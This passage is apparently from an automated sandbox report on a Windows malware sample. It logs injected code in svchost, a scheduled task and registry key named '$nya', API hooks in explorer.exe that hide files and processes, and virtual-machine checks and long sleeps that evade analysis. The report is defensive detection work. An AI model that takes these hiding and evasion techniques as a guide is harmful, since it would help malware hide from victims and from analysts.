        Source: C:\Windows\System32\svchost.exe Code function: 23_3_000001DC59CFC62D push rcx; retf 003Fh 23_3_000001DC59CFC62E
        Source: C:\Windows\System32\svchost.exe Code function: 25_3_0000017A8CDCC62D push rcx; retf 003Fh 25_3_0000017A8CDCC62E
        Source: C:\Windows\System32\svchost.exe Code function: 27_3_00000220C26EC62D push rcx; retf 003Fh 27_3_00000220C26EC62E
        Source: C:\Windows\System32\svchost.exe Code function: 28_3_0000025AF1E7C62D push rcx; retf 003Fh 28_3_0000025AF1E7C62E
        Source: C:\Windows\System32\svchost.exe Code function: 29_3_0000027BFF5DC62D push rcx; retf 003Fh 29_3_0000027BFF5DC62E
        Source: C:\Windows\System32\svchost.exe Code function: 30_3_000001CEE057C62D push rcx; retf 003Fh 30_3_000001CEE057C62E
        Source: C:\Windows\System32\svchost.exe Code function: 31_3_000001B12B37C62D push rcx; retf 003Fh 31_3_000001B12B37C62E
        Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$nya-mPeY5dGd

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: OpenProcess
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwQueryKey
        Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: OpenThread new code: 0xE9 0x92 0x23 0x33 0x3F 0xFC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3733
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2474
        Source: C:\Windows\System32\cmd.exe | Window / User API: threadDelayed 925
        Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 701
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3406
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2861
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6049
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3662
        Source: C:\Windows\System32\more.com | Window / User API: threadDelayed 958
        Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 6478
        Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 7743
        Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 932
        Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 562
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1333
        Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 8286
        Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 672
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1121
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1250
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1189
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1087
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1318
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1320
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1169
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1287
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 833
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1278
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1281
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1190
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1223
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1229
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1234
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1255
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1176
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1214
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1128
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1112
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1109
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 933
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1005
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1173
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1144
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1188
        Source: C:\Windows\System32\spoolsv.exe | Window / User API: threadDelayed 1181
        Source: C:\Windows\System32\cmd.exe | API coverage: 9.8 %
        Source: C:\Windows\System32\conhost.exe | API coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.5 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 | Thread sleep count: 3733 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 | Thread sleep count: 2474 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\cmd.exe TID: 7460 | Thread sleep time: -46250s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416 | Thread sleep count: 3406 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416 | Thread sleep count: 2861 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440 | Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1140 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420 | Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\System32\more.com TID: 7512 | Thread sleep count: 958 > 30
        Source: C:\Windows\System32\more.com TID: 7512 | Thread sleep time: -47900s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 7052 | Thread sleep count: 6478 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 7052 | Thread sleep time: -6478000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 5588 | Thread sleep count: 263 > 30
        Source: C:\Windows\System32\lsass.exe TID: 7048 | Thread sleep count: 7743 > 30
        Source: C:\Windows\System32\lsass.exe TID: 7048 | Thread sleep time: -7743000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 4508 | Thread sleep count: 932 > 30
        Source: C:\Windows\System32\lsass.exe TID: 4508 | Thread sleep time: -46600s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 7048 | Thread sleep count: 562 > 30
        Source: C:\Windows\System32\lsass.exe TID: 7048 | Thread sleep time: -562000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1948 | Thread sleep count: 67 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1948 | Thread sleep time: -67000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3400 | Thread sleep count: 1333 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3400 | Thread sleep time: -66650s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 3396 | Thread sleep count: 8286 > 30
        Source: C:\Windows\System32\dwm.exe TID: 3396 | Thread sleep time: -8286000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 3272 | Thread sleep count: 672 > 30
        Source: C:\Windows\System32\dwm.exe TID: 3272 | Thread sleep time: -33600s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1788 | Thread sleep count: 53 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1788 | Thread sleep time: -53000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1568 | Thread sleep count: 1121 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1568 | Thread sleep time: -56050s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2068 | Thread sleep count: 105 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2068 | Thread sleep time: -105000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3528 | Thread sleep count: 1250 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3528 | Thread sleep time: -62500s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3508 | Thread sleep count: 97 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3508 | Thread sleep time: -97000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1272 | Thread sleep count: 1189 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1272 | Thread sleep time: -59450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1288 | Thread sleep count: 113 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1288 | Thread sleep time: -113000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 392 | Thread sleep count: 1087 > 30
        Source: C:\Windows\System32\svchost.exe TID: 392 | Thread sleep time: -54350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4940 | Thread sleep count: 1318 > 30
        Source: C:\Windows\System32\svchost.exe TID: 4940 | Thread sleep time: -65900s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3744 | Thread sleep count: 97 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3744 | Thread sleep time: -97000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1960 | Thread sleep count: 1320 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1960 | Thread sleep time: -66000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2984 | Thread sleep count: 1169 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2984 | Thread sleep time: -58450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3452 | Thread sleep count: 98 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3452 | Thread sleep time: -98000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1840 | Thread sleep count: 1287 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1840 | Thread sleep time: -64350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1864 | Thread sleep count: 833 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1864 | Thread sleep time: -41650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1856 | Thread sleep count: 100 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1856 | Thread sleep time: -100000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5356 | Thread sleep count: 97 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5356 | Thread sleep time: -97000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6812 | Thread sleep count: 1278 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6812 | Thread sleep time: -63900s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1892 | Thread sleep count: 48 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1892 | Thread sleep time: -48000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3868 | Thread sleep count: 1281 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3868 | Thread sleep time: -64050s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1208 | Thread sleep count: 1190 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1208 | Thread sleep time: -59500s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2216 | Thread sleep count: 97 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2216 | Thread sleep time: -97000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2112 | Thread sleep count: 1223 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2112 | Thread sleep time: -61150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1968 | Thread sleep count: 48 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1968 | Thread sleep time: -48000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1724 | Thread sleep count: 1229 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1724 | Thread sleep time: -61450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3620 | Thread sleep count: 1234 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3620 | Thread sleep time: -61700s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3176 | Thread sleep count: 1255 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3176 | Thread sleep time: -62750s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4616 | Thread sleep count: 1176 > 30
        Source: C:\Windows\System32\svchost.exe TID: 4616 | Thread sleep time: -58800s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2980 | Thread sleep count: 1214 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2980 | Thread sleep time: -60700s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3340 | Thread sleep count: 1128 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3340 | Thread sleep time: -56400s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5848 | Thread sleep count: 1112 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5848 | Thread sleep time: -55600s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2188 | Thread sleep count: 1109 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2188 | Thread sleep time: -55450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep count: 933 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep time: -46650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3284 | Thread sleep count: 1005 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3284 | Thread sleep time: -50250s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3616 | Thread sleep count: 1173 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3616 | Thread sleep time: -58650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1420 | Thread sleep count: 1144 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1420 | Thread sleep time: -57200s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2876 | Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3828 | Thread sleep count: 1188 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3828 | Thread sleep time: -59400s >= -30000s
        Source: C:\Windows\System32\spoolsv.exe TID: 2072 | Thread sleep count: 1181 > 30
        Source: C:\Windows\System32\spoolsv.exe TID: 2072 | Thread sleep time: -59050s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\cmd.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\more.com | Last function: Thread delayed
        Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
        Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BEF264 FindFirstFileExW,4_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_000002640732F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_000002640732F264 FindFirstFileExW,5_2_000002640732F264
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE52F264 FindFirstFileExW,16_2_00000234FE52F264
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE52F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00000234FE52F3E8
        Source: C:\Windows\System32\lsass.exe | Code function: 18_2_000002158AEEF264 FindFirstFileExW,18_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exe | Code function: 18_2_000002158AEEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001E8A01AF264 FindFirstFileExW,19_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001E8A01AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000001E8A01AF3E8
        Source: C:\Windows\System32\dwm.exe | Code function: 20_2_000001F08894F264 FindFirstFileExW,20_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exe | Code function: 20_2_000001F08894F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001AC86F7F264 FindFirstFileExW,21_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001AC86F7F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000014785FBF264 FindFirstFileExW,22_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000014785FBF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_000001DC59D1F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_000001DC59D1F264 FindFirstFileExW,23_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_0000016588BCF264 FindFirstFileExW,24_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_0000016588BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000017A8D34F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000017A8D34F264 FindFirstFileExW,25_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001F34D8BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001F34D8BF264 FindFirstFileExW,26_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00000220C270F264 FindFirstFileExW,27_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F264 FindFirstFileExW,28_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F264 FindFirstFileExW,29_2_0000027BFFD3F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F264 FindFirstFileExW,30_2_000001CEE059F264
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F264 FindFirstFileExW,31_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000001B12B39F3E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000
        Source: svchost.exe, 0000001B.00000002.2624107430.00000220C465C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s\GvmciW
        Source: svchost.exe, 0000001B.00000002.2552336547.00000220C2042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1547637322.00000220C2042000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
        Source: svchost.exe, 0000001B.00000000.1547637322.00000220C2042000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: svchost.exe, 00000018.00000002.2591998833.0000016588DD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
        Source: svchost.exe, 0000001B.00000000.1547344289.00000220C1FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
        Source: powershell.exe, 0000000C.00000002.1364727100.0000024554943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
        Source: svchost.exe, 0000001B.00000003.1573742854.00000220C4585000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
